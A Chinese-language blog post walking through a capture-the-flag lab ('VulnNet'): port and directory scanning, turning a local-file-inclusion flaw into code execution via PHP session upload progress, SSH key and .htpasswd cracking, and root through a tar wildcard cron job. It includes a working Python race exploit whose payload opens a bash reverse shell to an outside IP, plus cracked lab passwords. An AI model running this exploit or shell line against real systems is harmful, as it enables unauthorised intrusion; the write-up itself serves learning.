iT邦幫忙

2021 iThome 鐵人賽

DAY 17
0

Recon

  • 掃 Port
    • rustscan -a 10.10.86.144 -r 1-65535
    • nmap -A -p22,80 10.10.86.144
  • 掃目錄
    • python3 dirsearch.py -u http://10.10.86.144/
  • 發現登入頁面
    • 戳了常見的 SQL injection 都不行
  • 觀察網頁連結
      • 透過 js formatter 自動進行格式化
      • 可以看到一個網址 broadcast.vulnnet.thm
        • 加到 /etc/hosts 指向同一個 IP
  • 訪問 broadcast.vulnnet.thm
    • 發現需要登入

LFI 2 RCE

  • 觀察首頁 referer 參數
    • 發現可以 LFI
    • 用 Session upload progress 大法就可以 RCE 了!!
import grequests
sess_name = 'meowmeow'
sess_path = f'/var/lib/php/sessions/sess_{sess_name}'
base_url = 'http://vulnnet.thm/index.php'
param = "referer"

#code = "file_put_contents('/tmp/shell.php','<?php system($_GET[a])');"
code = '''system("bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'");'''

while True:
    req = [grequests.post(base_url,
                            files={'f': "A"*0xffff},
                            data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:<?php {code} ?>"},
                            cookies={'PHPSESSID': sess_name}),
            grequests.get(f"{base_url}?{param}={sess_path}")]

    result = grequests.map(req)
    if "pwned" in result[1].text:
        print(result[1].text)
        break
                   
  • 然後就 RCE 了
    • (感覺就不是正規解...ㄏㄏ)

提權

  • 先用豌豆掃描一次
      • 發現一個 Cronjob
    • 找到 backup
  • 觀察 backup 檔案,發現有 ssh-backup
    • 先偷出來再說
  • 解壓縮
    • 發現是 id_rsa
  • 到家目錄看使用者名稱
    • 發現使用者是 server-management

SSH 登入

  • 準備 ssh 登入
    • 發現 id_rsa 需要密碼 QQ
  • 用約翰爆破
    • python3 ../../ssh2john.py id_rsa > id_rsa_john
    • 密碼是 oneTWO3gOyac
  • SSH 登入
    • 取得 user flag
  • 跑豌豆掃到 .htpasswd 密碼的 hash
    • 猜測應該是給 broadcast.vulnnet.thm 用的
    • 用約翰爆破個
      • 密碼是 9972761drmfsls
    • 猜測原始思路正規解法應該是,前面 LFI 到這個檔案然後取得密碼後來做進一步的動作
  • 訪問 broadcast.vulnnet.thm
    • 使用帳號 developers
    • 密碼 9972761drmfsls
      • 推測這應該是某個有 RCE 洞的 CMS

二次提權

  • 想起前面的 Backup 用了 tar *
  • 收 Shell
  • 取得 Root Flag

上一篇
[Day16] THM Tomghost
下一篇
[Day18] THM AgentSudo
系列文
我想學滲透測試喵喵喵喵!!!!30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言